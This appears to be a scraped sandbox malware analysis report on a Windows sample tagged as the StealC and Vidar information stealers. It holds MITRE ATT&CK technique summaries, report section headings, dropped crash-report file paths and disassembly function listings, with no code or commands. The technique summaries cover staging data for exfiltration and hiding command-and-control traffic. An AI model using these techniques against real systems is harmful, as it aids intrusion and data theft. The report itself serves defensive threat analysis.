Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report w7kdnBzGat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w7kdnBzGat.exe_3c8c512cf549e9ce237cc88c2aab5759f36d91_ed2726f5_58e1a148-72c3-4395-902b-3ee4fba2d5b4\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD38.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD87.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFDD6.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Windows Analysis Report
w7kdnBzGat.exe

Function 00E1018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Function 005222C6 Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 1042
COMMON

Function 00505166 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 004C7CBE Relevance: 6.1, APIs: 4, Instructions: 92
COMMON

Function 004C7D0C Relevance: 6.1, APIs: 4, Instructions: 65
COMMON

Function 004D673E Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMONLIBRARYCODE

Function 004A5662 Relevance: 4.5, APIs: 3, Instructions: 33
threadCOMMON

Function 004D65AA Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Function 004D6485 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Function 00504105 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Function 00522017 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 00505231 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Function 004C9D04 Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Function 00509CCC Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Function 004A17AA Relevance: 1.5, APIs: 1, Instructions: 31
threadCOMMON